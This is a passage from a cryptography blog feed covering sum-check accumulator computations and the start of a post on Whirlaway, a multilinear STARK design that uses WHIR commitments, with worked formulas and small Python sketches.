&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;$v$&lt;&#x2F;th&gt;&lt;th&gt;$u$&lt;&#x2F;th&gt;&lt;th&gt;$p_1 = v+2$&lt;&#x2F;th&gt;&lt;th&gt;$p_2 = u+4$&lt;&#x2F;th&gt;&lt;th&gt;&lt;strong&gt;$tA[v,u]$&lt;&#x2F;strong&gt;&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;$\infty$&lt;&#x2F;td&gt;&lt;td&gt;$\infty$&lt;&#x2F;td&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;$1 \cdot 1 = 1$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;$\infty$&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;4&lt;&#x2F;td&gt;&lt;td&gt;$1 \cdot 4 = 4$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;$\infty$&lt;&#x2F;td&gt;&lt;td&gt;2&lt;&#x2F;td&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;$2 \cdot 1 = 2$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;2&lt;&#x2F;td&gt;&lt;td&gt;4&lt;&#x2F;td&gt;&lt;td&gt;$2 \cdot 4 = 8$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;$\infty$&lt;&#x2F;td&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;$3 \cdot 1 = 3$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;0&lt;&#x2F;td&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;4&lt;&#x2F;td&gt;&lt;td&gt;$3 \cdot 4 = 12$&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;We are now in a position to construct a table with the final accumulators involved in this round. Since the prover needs to send evaluations at $\infty$ and $0$, we only compute the accumulators&lt;&#x2F;p&gt;
&lt;p&gt;$$A_2(\infty,\infty),\; A_2(0,\infty),\; A_2(1,\infty),\; A_2(\infty,0),\; A_2(0,0),\;\text{and}\; A_2(1,0)$$&lt;&#x2F;p&gt;
&lt;p&gt;Remember: the $E_{out,2}$ and $E_{in}$ weights eliminate most of the sums in the definition&lt;&#x2F;p&gt;
&lt;p&gt;$$A_2 (v,u) = \sum\limits_{x_{out}} E_{out,2} \sum\limits_{x_{in}} E_{in}[x_{in}] p_1 (v,u,x_{in},x_{out}) p_2 (v,u,x_{in},x_{out})$$&lt;&#x2F;p&gt;
&lt;p&gt;which reduces to&lt;&#x2F;p&gt;
&lt;p&gt;$$A_2(v,u) = p_1(v,u,1,1,0,1) p_2(v,u,1,1,0,1)$$&lt;&#x2F;p&gt;
&lt;p&gt;This drastic reduction in cases is a clear example of how this approach to computing the round polynomials works: block partitioning the eq factor collected by $t_i$ causes much of the sum to vanish and yields very few nontrivial summands contributing to the accumulators.&lt;&#x2F;p&gt;
&lt;p&gt;For completeness, here’s a table showing the final accumulators&lt;&#x2F;p&gt;
&lt;h3 id=&quot;final-accumulator-values-for-round-2&quot;&gt;Final Accumulator Values for Round 2&lt;&#x2F;h3&gt;
&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;&lt;strong&gt;$A_2(v,u)$&lt;&#x2F;strong&gt;&lt;&#x2F;th&gt;&lt;th&gt;&lt;strong&gt;$u=\infty$&lt;&#x2F;strong&gt;&lt;&#x2F;th&gt;&lt;th&gt;&lt;strong&gt;$u=0$&lt;&#x2F;strong&gt;&lt;&#x2F;th&gt;&lt;th&gt;&lt;strong&gt;$u=1$&lt;&#x2F;strong&gt;&lt;&#x2F;th&gt;&lt;&#x2F;tr&gt;&lt;&#x2F;thead&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td&gt;&lt;strong&gt;$v=\infty$&lt;&#x2F;strong&gt;&lt;&#x2F;td&gt;&lt;td&gt;1&lt;&#x2F;td&gt;&lt;td&gt;4&lt;&#x2F;td&gt;&lt;td&gt;(not needed)&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;strong&gt;$v=0$&lt;&#x2F;strong&gt;&lt;&#x2F;td&gt;&lt;td&gt;2&lt;&#x2F;td&gt;&lt;td&gt;8&lt;&#x2F;td&gt;&lt;td&gt;(not needed)&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;strong&gt;$v=1$&lt;&#x2F;strong&gt;&lt;&#x2F;td&gt;&lt;td&gt;3&lt;&#x2F;td&gt;&lt;td&gt;12&lt;&#x2F;td&gt;&lt;td&gt;(not needed)&lt;&#x2F;td&gt;&lt;&#x2F;tr&gt;
&lt;&#x2F;tbody&gt;&lt;&#x2F;table&gt;
&lt;p&gt;In this round, we combine the accumulators using the entries of the challenge vector as weights to produce the evaluations of $t_2(u)$:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Computation of $t_2(0)$:**  &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;\begin{align*}&lt;br &#x2F;&gt;
t_2(0) &amp;amp;= \sum_{v \in U_2} R_2[v] \cdot A_2(v, 0) \newline&lt;br &#x2F;&gt;
&amp;amp;= r_1(r_1 - 1) \cdot A_2(\infty, 0) + (1 - r_1)\cdot A_2(0, 0) + r_1 \cdot A_2(1, 0) \newline&lt;br &#x2F;&gt;
&amp;amp;= r_1(r_1 - 1) \cdot 4 + (1 - r_1) \cdot 8 + r_1 \cdot 12&lt;br &#x2F;&gt;
\end{align*}
* &lt;strong&gt;Computation of $t_2(\infty)$&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
\begin{align*}&lt;br &#x2F;&gt;
t_2(\infty) &amp;amp;= \sum_{v \in U_2} R_2[v] \cdot A_2(v, \infty) \newline&lt;br &#x2F;&gt;
&amp;amp;= (r_1(r_1 - 1) \cdot A_2(\infty, \infty)) + ((1 - r_1)\cdot A_2(0, \infty)) + (r_1 \cdot A_2(1, \infty)) \newline&lt;br &#x2F;&gt;
&amp;amp;= (r_1(r_1-1) \cdot 1) + ((1 - r_1) \cdot 2) + (r_1 \cdot 3)&lt;br &#x2F;&gt;
\end{align*}&lt;&#x2F;p&gt;
&lt;p&gt;Finally, the prover sends the following values to the verifier&lt;&#x2F;p&gt;
&lt;p&gt;$$s_2(\infty) = l_2(\infty)\cdot t_2(\infty)\quad\text{and}\quad s_2(0) = l_2(0)\cdot t_2(0)$$&lt;&#x2F;p&gt;
&lt;p&gt;(An actual prover substitutes the numerical challenge $r_1$ and hands a numerical output to the verifier, and that is it for the first two rounds.)&lt;&#x2F;p&gt;
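&lt;p&gt;To see round 2 end to end, we can plug a sample numerical challenge into the inner product $t_2(u) = \langle R_2, A_2(u) \rangle$ using the accumulator table above (a sketch with our own naming; $r_1 = 2$ is an arbitrary sample value):&lt;&#x2F;p&gt;

```python
# Round 2 end to end with a sample challenge (our sketch; r_1 = 2 is an
# arbitrary value). A2 holds the accumulator table from the text.
def t2(u, r1, A2):
    R2 = {"inf": r1 * (r1 - 1), 0: 1 - r1, 1: r1}
    return sum(R2[v] * A2[(v, u)] for v in R2)

A2 = {("inf", "inf"): 1, (0, "inf"): 2, (1, "inf"): 3,
      ("inf", 0): 4, (0, 0): 8, (1, 0): 12}
r1 = 2
print(t2(0, r1, A2))      # 2*4 - 1*8 + 2*12 = 24
print(t2("inf", r1, A2))  # 2*1 - 1*2 + 2*3 = 6
```

&lt;p&gt;With $l_2(\infty) = -r_1$ and $l_2(0) = r_1$, the prover’s messages $s_2(\infty)$ and $s_2(0)$ follow by one more multiplication each.&lt;&#x2F;p&gt;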
&lt;h2 id=&quot;rounds-after-l-0&quot;&gt;Rounds After $l_0$&lt;&#x2F;h2&gt;
&lt;p&gt;Once the optimized rounds using pre-computation are finished, the algorithm switches its strategy for the remainder of the protocol.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * **Transition Phase (Round $l_0 + 1$)**  &lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;The objective of this single round is to switch from the ’‘fast mode’’ of pre-computation to the ’‘standard’’ linear mode. The prover computes the evaluations of the polynomials $p_k$ with the first $l_0$ variables already fixed to the challenges $(r_1, \dots, r_{l_0})$. The result of this phase is the creation of the data arrays (called $P_k$) that will be used in the final rounds.
* &lt;strong&gt;Final Phase (Rounds $l_0+2$ to $l$)&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
From this point on, the protocol follows the standard linear sum-check algorithm (similar to Algorithm 1 or 5). In each of these rounds:&lt;br &#x2F;&gt;
i. The prover uses the current arrays $P_k$ to compute and send its message.&lt;br &#x2F;&gt;
ii. It receives a new challenge $r_i$.&lt;br &#x2F;&gt;
iii. It uses the challenge to combine pairs of entries in the arrays, &lt;strong&gt;halving their size&lt;&#x2F;strong&gt; and preparing everything for the next round.&lt;&#x2F;p&gt;
&lt;p&gt;This halving process continues until the last round, where the arrays are so small that the problem is reduced to a single final check.&lt;&#x2F;p&gt;
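&lt;p&gt;The halving step admits a one-line sketch. Note that the pairing convention below (combining adjacent entries as $(1-r)\cdot\text{even} + r\cdot\text{odd}$) is our illustrative assumption, not necessarily the exact layout used in the paper:&lt;&#x2F;p&gt;

```python
# One folding step after round l_0 (our sketch; the even/odd pairing is
# an illustrative assumption): combine adjacent entries with the fresh
# challenge r, halving the array.
def fold(P, r):
    return [(1 - r) * P[2 * k] + r * P[2 * k + 1] for k in range(len(P) // 2)]

P = [3, 7, 1, 5]
print(fold(P, 2))  # [11, 9]: the array has been halved
```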
</description>
      </item>
      <item>
          <title>Whirlaway: Multilinear STARKs using WHIR as polynomial commitment scheme</title>
          <pubDate>Fri, 29 Aug 2025 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/whirlaway-multilinear-starks-using-whir-as-polynomial-commitment-scheme/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/whirlaway-multilinear-starks-using-whir-as-polynomial-commitment-scheme/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/whirlaway-multilinear-starks-using-whir-as-polynomial-commitment-scheme/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;Ethereum has been quickly evolving to become the financial backend of the World. Research and development in zero-knowledge proofs have allowed Ethereum to scale with rollups, by batching transactions off-chain and then posting an update of the accounts together with a cryptographic proof attesting to the validity of the transactions. While progress has been impressive, there remain still some challenges related to the rise of quantum computers (which would break elliptic curve cryptography, now a core primitive in Ethereum), increasing decentralization, and simplifying the protocol to reduce attack surface and possible bugs.&lt;&#x2F;p&gt;
&lt;p&gt;Ethereum presented in Devcon 2024 the roadmap for &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;leanroadmap.org&#x2F;&quot;&gt;Lean Ethereum&lt;&#x2F;a&gt; to research, define specifications, develop, test and deploy the future of Ethereum, which would allow the protocol to go on maintenance mode and avoid performing major changes. One of the key problems is related to post-quantum secure aggregatable signatures to replace the (elliptic curve-based) BLS signatures powering Ethereum’s consensus. While there are several candidates for post-quantum secure signatures, we should pay attention to those that can provide an efficient aggregation algorithm or whose verification can be proven efficiently using post-quantum secure proof systems. Hash-based signatures using SNARK (succinct, non-interactive argument of knowledge)-friendly hashes (such as Poseidon 2 or Rescue Prime Optimized) appear as promising candidates, since current state of the art provers are able to prove nearly 1,000,000 hashes per second on GPU. An important constraint is related to proof sizes, which should be as small as possible, to reduce the communication footprint between the nodes. Current security analysis shows that proof sizes targeting 128 bits of security using FRI are larger than desired, which is why a different candidate is needed. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2024&#x2F;1586.pdf&quot;&gt;WHIR&lt;&#x2F;a&gt; provides a good candidate, even though it may be slower in concrete terms compared to FRI. It is not surprising, then, that the roadmap contains at least 4 elements targeting the primitives for post-quantum secure aggregatable signatures using succinct arguments of knowledge:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Poseidon cryptanalysis initiative.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Hash-based multisignatures&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Minimal zero-knowledge virtual machines (to handle proof aggregation)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * Formal verification of virtual machines and specification of proof systems.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;In this post, we will cover the basics of WHIR used to prove the execution of a virtual machine as described by means of an algebraic intermediate representation (AIR). The way to derive the non-interactive argument of knowledge will be in a standard way, first by a polynomial interactive oracle proof, instantiating the oracle proof using a polynomial commitment scheme and using the Fiat-Shamir transformation. Later posts will focus on signature schemes and virtual machines. You can see the presentation of &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;ethresear.ch&#x2F;t&#x2F;whir-for-ethereum&#x2F;22938&quot;&gt;WHIR at ethresearch&lt;&#x2F;a&gt; for further references, as well as the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2024&#x2F;1586.pdf&quot;&gt;WHIR paper&lt;&#x2F;a&gt;. For the specification of Whirlaway, see the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;TomWambsgans&#x2F;Whirlaway&#x2F;tree&#x2F;master&quot;&gt;repo&lt;&#x2F;a&gt;, as well as &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;tcoratger&#x2F;whir-p3&#x2F;tree&#x2F;main&#x2F;src&#x2F;whir&#x2F;pcs&quot;&gt;whir-p3&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;multilinear-polynomials&quot;&gt;Multilinear polynomials&lt;&#x2F;h2&gt;
&lt;p&gt;A polynomial in $m$ variables is called multilinear if, in every monomial, the power of each indeterminate $x_i$ is at most 1.&lt;&#x2F;p&gt;
&lt;p&gt;Given a set of evaluations of a function $f$ over $H^m$, there is a unique multilinear polynomial $\hat{f}$ such that $\hat{f} (x) = f(x)$ for every $x \in H^m$. We can represent the same multilinear polynomial using different bases, the two most common being the monomial basis ($1, x_0, x_1, x_0 x_1, x_2, x_0 x_2, \dots$) and the Lagrange basis over $H^m$. For simplicity, we will henceforth take $H = \{0, 1\}$. The Lagrange basis polynomials are defined as follows,&lt;br &#x2F;&gt;
$\chi_k (x) = \mathrm{eq} ( k_b , x) = \prod_i ( k_{b,i} x_i + (k_{b,i} - 1)(x_i - 1))$&lt;br &#x2F;&gt;
where $k_b$ is the binary decomposition of $k$, that is, $k = \sum_i k_{b,i} 2^i$. The multilinear extension, given the evaluations of $f$ over $\{0, 1\}^m$, is&lt;br &#x2F;&gt;
$\hat{f} (x) = \sum_{b \in \{0,1\}^m } f(b) \mathrm{eq} (b , x) = \sum_k f_k \chi_k (x)$&lt;&#x2F;p&gt;
&lt;p&gt;We can easily check that we can evaluate $\hat{f} (x)$ at any point by evaluating the Lagrange polynomials $\chi_k (x)$ and performing a scalar product between the vector of evaluations of $f$ and the vector of Lagrange basis polynomials,&lt;br &#x2F;&gt;
$\hat{f} (z) = \sum_k f_k \chi_k (z) = f^t \cdot \chi$&lt;&#x2F;p&gt;
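&lt;p&gt;As a minimal sketch of this evaluation procedure in Python (the field size and the table of evaluations are arbitrary choices for the example), we can compute the Lagrange basis values $\chi_k(z)$ and take the scalar product with the evaluation vector:&lt;&#x2F;p&gt;

```python
P = 97  # a small prime field, chosen only for illustration

def chi(k, z, m):
    # Lagrange basis polynomial chi_k(z) = eq(k_b, z), with k_b the binary
    # decomposition of k: prod_i (k_{b,i} z_i + (k_{b,i} - 1)(z_i - 1))
    kb = [(k >> i) & 1 for i in range(m)]
    prod = 1
    for ki, zi in zip(kb, z):
        prod = prod * (ki * zi + (ki - 1) * (zi - 1)) % P
    return prod

def eval_mle(f_evals, z):
    # f_hat(z) = sum_k f_k chi_k(z): a scalar product between the vector of
    # evaluations of f over {0,1}^m and the vector of Lagrange basis values
    m = len(z)
    return sum(fk * chi(k, z, m) for k, fk in enumerate(f_evals)) % P

# On a corner of the hypercube, the extension agrees with the table of values
evals = [5, 6, 7, 8]            # f over {0,1}^2, index k = x_0 + 2*x_1
assert eval_mle(evals, (1, 0)) == 6
# At an arbitrary point the extension interpolates: f_hat(2, 3) = 13 mod 97
assert eval_mle(evals, (2, 3)) == 13
```

This costs $\mathcal{O}(2^m)$ field operations per evaluation, since every Lagrange basis value is recomputed from scratch.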
&lt;p&gt;We can find a way of seeing a multilinear polynomial as a univariate polynomial by a suitable transformation. Given a polynomial in the multilinear basis,&lt;br &#x2F;&gt;
$$f(x_0 , x_1 , x_2 , \dots , x_{ m - 1 } ) = a_0 + a_1 x_0 + a_2 x_1 + a_3 x_0 x_1 + a_4 x_2 + a_5 x_0 x_2 + a_6 x_1 x_2 + \dots + a_{ 2^m - 1 } x_0 x_1 \dots x_{m - 1}$$&lt;br &#x2F;&gt;
If we let $x_0 = x$, $x_1 = x^2$, $x_2 = x^4$, $\dots$, $x_{m - 1} = x^{ 2^{ m - 1} }$, then&lt;br &#x2F;&gt;
$$f(x) = a_0 + a_1 x + a_2 x^2 + a_3 x x^2 + a_4 x^4 + a_5 x x^4 + a_6 x^2 x^4 + \dots + a_{ 2^m - 1 } x x^2 x^4 \dots x^{ 2^{ m - 1 } }$$&lt;&#x2F;p&gt;
&lt;p&gt;Doing all the products, $f( x ) = \sum_j a_j x^j$&lt;&#x2F;p&gt;
&lt;p&gt;WHIR will make use of this transformation from the multilinear monomial basis to the univariate monomial basis. For example, the paper defines $\mathrm{pow} (z, m) = (z , z^2 , \dots , z^{ 2^{ m - 1 } })$, which is used to evaluate the multilinear polynomial $\hat{f}$ at the point corresponding to $z$, recovering $f(z)$.&lt;&#x2F;p&gt;
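&lt;p&gt;A small Python sketch of this correspondence (the field size and coefficients are arbitrary for the example): evaluating the multilinear polynomial at $\mathrm{pow}(z, m)$ agrees with evaluating the univariate polynomial $\sum_j a_j x^j$ at $z$.&lt;&#x2F;p&gt;

```python
P = 97  # a small prime field, chosen only for illustration

def pow_vec(z, m):
    # pow(z, m) = (z, z^2, z^4, ..., z^(2^(m-1)))
    return [pow(z, 2 ** i, P) for i in range(m)]

def eval_multilinear(coeffs, point):
    # coefficients a_j in the multilinear monomial basis; bit i of the
    # index j tells whether variable x_i appears in the monomial
    total = 0
    for j, aj in enumerate(coeffs):
        term = aj
        for i, xi in enumerate(point):
            if (j >> i) & 1:
                term = term * xi % P
        total = (total + term) % P
    return total

def eval_univariate(coeffs, z):
    return sum(aj * pow(z, j, P) for j, aj in enumerate(coeffs)) % P

coeffs = [1, 2, 3, 4, 5, 6, 7, 8]   # m = 3 variables, univariate degree at most 7
for z in (2, 5, 10):
    assert eval_multilinear(coeffs, pow_vec(z, 3)) == eval_univariate(coeffs, z)
```

The agreement holds because the monomial indexed by $j$ picks exactly the variables whose bits are set in $j$, and substituting $x_i = x^{2^i}$ turns their product into $x^j$.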
&lt;h2 id=&quot;sumcheck-protocol&quot;&gt;Sumcheck protocol&lt;&#x2F;h2&gt;
&lt;p&gt;The sumcheck protocol is an important building block for designing efficient interactive proofs. The sumcheck protocol is applied to proving statements of the form&lt;br &#x2F;&gt;
$\sum_{x \in H^\ell} f(x) = S$&lt;br &#x2F;&gt;
where $f(x)$ is a multivariate polynomial in $\ell$ variables and $H$ is a set (typically, $\{0, 1\}$). In other words, we want to show that the sum of the evaluations of $f$ over all the values in $H^\ell$ is equal to $S$. While this seems a bit restrictive or convoluted, many computations can be reduced to an instance of this protocol via a suitable transformation. For example, the evaluation of the multilinear extension of a function at $z$ can be written precisely in this form, using the Lagrange basis polynomials,&lt;br &#x2F;&gt;
$\hat{f} (z) = \sum_{b \in \{0,1\}^m } f(b) \mathrm{eq} (b , z)$&lt;br &#x2F;&gt;
The protocol allows the prover to convince the verifier that the sum is $S$ by sending $\mathcal{O} (\ell)$ elements, with the verifier performing $\mathcal{O} (\ell)$ operations plus a single evaluation of $f$ at a random point $(r_0, r_1, \dots , r_{ \ell - 1})$. We can then compile this into a non-interactive succinct argument of knowledge using the Fiat-Shamir transformation, relying on a polynomial commitment scheme (PCS) to grant the verifier oracle access to $f(r_0, r_1, \dots , r_{ \ell - 1})$.&lt;&#x2F;p&gt;
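&lt;p&gt;The following Python sketch runs the sumcheck rounds for a multilinear polynomial given by its evaluations over $\{0,1\}^\ell$, with prover and verifier interleaved in one loop. The field and example values are illustrative assumptions; since $f$ is multilinear, each round polynomial is linear, so it can be sent as its values at 0 and 1.&lt;&#x2F;p&gt;

```python
import random

P = 2**31 - 1  # a prime field, chosen only for illustration

def bind(evals, r):
    # fix the first variable x_0 to r: table of f(r, x_1, ...) from that of f
    return [(evals[2*i] * (1 - r) + evals[2*i + 1] * r) % P
            for i in range(len(evals) // 2)]

def sumcheck(evals):
    # honest prover and verifier for sum over {0,1}^l of f(x) = S
    claim = sum(evals) % P
    table, rs, current = evals[:], [], claim
    while len(table) > 1:
        # prover: round polynomial g_j, sent as the pair (g_j(0), g_j(1))
        g0 = sum(table[0::2]) % P
        g1 = sum(table[1::2]) % P
        # verifier: consistency check g_j(0) + g_j(1) == previous claim
        assert (g0 + g1) % P == current
        r = random.randrange(P)                 # verifier's random challenge
        rs.append(r)
        current = (g0 * (1 - r) + g1 * r) % P   # g_j(r), next round's claim
        table = bind(table, r)
    # final check: one oracle query to f at the random point (r_0, ..., r_{l-1})
    oracle = evals[:]
    for r in rs:
        oracle = bind(oracle, r)
    assert oracle[0] == current
    return claim

assert sumcheck([3, 1, 4, 1, 5, 9, 2, 6]) == 31
```

In a real deployment the challenges would come from a Fiat-Shamir transcript rather than local randomness, and the final query would go through the PCS opening.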
&lt;p&gt;The sumcheck protocol can be used several times to reduce complex claims into simpler ones, such as in &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2019&#x2F;550&quot;&gt;Spartan&lt;&#x2F;a&gt;. We can also combine several sumchecks into a single one by batching them using random linear combinations. For example, say we want to prove that:&lt;br &#x2F;&gt;
$\sum_{x \in H^\ell} f_1 (x) = S_1$&lt;br &#x2F;&gt;
$\sum_{x \in H^\ell} f_2 (x) = S_2$&lt;br &#x2F;&gt;
We can have the verifier sample random scalars $\alpha_1, \alpha_2$ and we can run the sumcheck over&lt;br &#x2F;&gt;
$\sum_{x \in H^\ell} \left( \alpha_1 f_1 (x) + \alpha_2 f_2 (x) \right) = \alpha_1 S_1 + \alpha_2 S_2$&lt;br &#x2F;&gt;
This reduces the number of elements that the prover needs to send to the verifier and the amount of work involved, compared to running the two instances separately.&lt;&#x2F;p&gt;
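&lt;p&gt;A quick numeric check of the batching identity in Python (sizes, field and values are arbitrary for the example):&lt;&#x2F;p&gt;

```python
import random

P = 2**31 - 1  # a prime field, chosen only for illustration

# two sums over the same hypercube, given directly by their evaluation tables
f1 = [random.randrange(P) for _ in range(8)]
f2 = [random.randrange(P) for _ in range(8)]
S1, S2 = sum(f1) % P, sum(f2) % P

# the verifier's random scalars
alpha1, alpha2 = random.randrange(P), random.randrange(P)

# a single sumcheck over the random linear combination suffices
batched = [(alpha1 * x + alpha2 * y) % P for x, y in zip(f1, f2)]
assert sum(batched) % P == (alpha1 * S1 + alpha2 * S2) % P
```

If either claimed sum were wrong, the combined claim would fail except with probability about $1&#x2F;|\mathbb{F}|$ over the choice of scalars.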
&lt;h2 id=&quot;overview-of-the-protocol&quot;&gt;Overview of the protocol&lt;&#x2F;h2&gt;
&lt;p&gt;In AIR, we have a set of polynomial constraints, such as:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $f_0 (x_7) = x_7 - a_k$ and which is valid for the first row. This is a boundary constraint.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $f_1 (x_0, x_1, x_2, y_0, y_1, y_2) = x_0 x_1 x_2 - y_0 y_1 y_2$ which should be valid for all consecutive rows, except the last one. This is an example of a transition constraint.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    * $f_2 (x_3) = x_3 (x_3 - 1)$ and valid over all rows, asserts that $x_3$ is a boolean variable. This constraint enforces a consistency condition.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;Constraints are given by a multivariate polynomial together with the set over which the constraint applies. The degree of the constraint (the highest degree among its monomials) is important, since it determines the number of points where we need to evaluate in order to fully determine the composition polynomial.&lt;&#x2F;p&gt;
&lt;p&gt;In ordinary STARKs, we can check the validity of the constraints by&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    1. Interpolating the trace columns to obtain (univariate) trace polynomials.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    2. Composing the trace polynomials with the constraint polynomials.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    3. Dividing each constraint by the corresponding zerofier.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    4. Use FRI to show that the result is close to a low-degree polynomial.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;If we want to use multivariate polynomials, we need to make some changes to how the protocol works. We will go step by step to show how everything fits together.&lt;&#x2F;p&gt;
&lt;p&gt;We will start with the trace table, $T$. We suppose that the trace has $2^n$ rows and $2^m$ columns. We can always pad tables not fulfilling this condition, or leverage the ideas of &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2025&#x2F;917&quot;&gt;jagged PCS&lt;&#x2F;a&gt; to avoid padding. The table has $2^{n + m}$ elements, which we can view as evaluations of a polynomial $f_{trace}$ over $\{0, 1\}^{n + m}$. In Whirlaway, the elements are stored in row-major order.&lt;&#x2F;p&gt;
&lt;p&gt;The trace is committed as a single multilinear polynomial using WHIR as a polynomial commitment scheme. We will reduce all the polynomial checks to a single evaluation of this polynomial, which we can prove thanks to the polynomial commitment scheme.&lt;&#x2F;p&gt;
&lt;p&gt;We can always get the columns from the trace polynomial by multiplying by a suitable polynomial, in the same way we could recover a column from the flattened vector using a suitable matrix-vector product. The computation is correct if we can show that each of the constraint polynomials vanishes on the corresponding set. Suppose we need to show that $f_{16} (X_3 ) = X_3 (X_3 - 1) = 0$ for all rows, where $X_3$ indicates that we need to evaluate this polynomial using column 3. We call this column polynomial $c_3 (x)$, defined by $c_3 ( j_b ) = c_{3j}$, where $j_b$ is the binary representation of $j$, with $j = 0, 1, \dots , 2^n - 1$. The validity of the constraint amounts to showing that $c_3 (x) (c_3 (x) - 1) = 0$ for all the valid values of $x = j_b$.&lt;&#x2F;p&gt;
&lt;p&gt;We apply a variant of the sumcheck protocol, called the zerocheck to show that all the evaluations are zero over the set:&lt;br &#x2F;&gt;
$$\sum_{ x \in \{0,1\}^{n}} \mathrm{eq} (\tau,x) c_3(x) (c_3 (x) - 1) = 0$$&lt;br &#x2F;&gt;
